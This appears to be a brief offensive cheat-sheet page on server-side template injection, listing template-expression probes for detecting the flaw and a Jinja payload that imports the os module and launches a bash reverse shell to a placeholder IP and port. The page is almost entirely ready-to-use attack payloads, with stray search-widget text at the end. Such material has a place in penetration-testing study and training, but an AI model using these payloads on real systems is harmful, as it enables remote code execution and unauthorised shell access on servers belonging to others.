SSTI

Table of content

Detection

{{7*7}}
${7*7}
<%= 7*7 %>
${{7*7}}
#{7*7}

Jinja

{{request.application.__globals__.__builtins__.__import__('os').popen('bash -c "bash -i >& /dev/tcp/${ip}/${port} 0>&1"').read()}}

results matching ""

    No results matching ""

    results matching ""

      No results matching ""